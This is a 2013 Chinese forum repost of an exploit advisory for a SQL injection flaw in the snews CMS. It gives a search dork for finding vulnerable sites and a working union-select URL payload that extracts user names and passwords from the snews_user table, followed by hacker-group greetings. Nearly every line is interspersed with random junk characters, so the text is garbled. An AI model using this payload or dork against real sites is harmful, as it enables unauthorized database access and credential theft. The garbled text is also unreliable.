标题: CMS snews SQL Injection Vulnerability% e ?1 d9 G+ g: d: G& g* s) t( Z
作者: By onestree
9 @- V5 d0 j1 K6 a% A( s下载地址 : http://snewscms.com/3 u1 [$ }) ^1 o! N
测试平台 : ubuntu 12.10 / win 7' g9 G* m0 k8 S3 H' V0 S
关键词: inurl:"tanyakan pada rumput yang bergoyang"
: s. b8 c' [, F2 M: R 2 a% o4 p; ]) ]- q7 F; `
4 b, v; A( t; {) p. k- y5 z$ `6 `4 `
*************************************************************
, P6 ~, f0 [2 {8 A5 K4 W! n + d% j! r m: J/ D+ d$ a$ k0 e
SQL poc:8 z0 f* B" f. m8 o
5 v2 W6 L9 j; C2 c7 C% `& q. }
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]0 _) O( z( o M
2 t, s* N: w, k5 H* E示例' Z" L) T9 U' M2 I) ^+ [: S
# `1 f y9 F7 Y) W2 i0 H; nhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*: S7 Y' l1 \6 w/ ]% K3 f
$ A* v. f" d8 y- l
5 }, k& O$ H0 h0 ~4 G) `" c: G致谢:# `& f0 ^- I8 [, \1 p
9 R. G# c# l7 F4 H ^: E1 S- q Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell8 z( a) j1 o9 s+ g; p6 b0 w
" m3 X- u/ }9 E, |! }
indonesiancoder - moeslimh4x0r - go-coder: J$ m6 _3 [+ E& r- U; w
# o6 u8 T- r4 k+ ? ~" ~: M( B
spesial my hunny :*3 p2 V9 f" k1 G8 J B
|
发表于 2013-1-23 08:55:06
收藏
支持
反对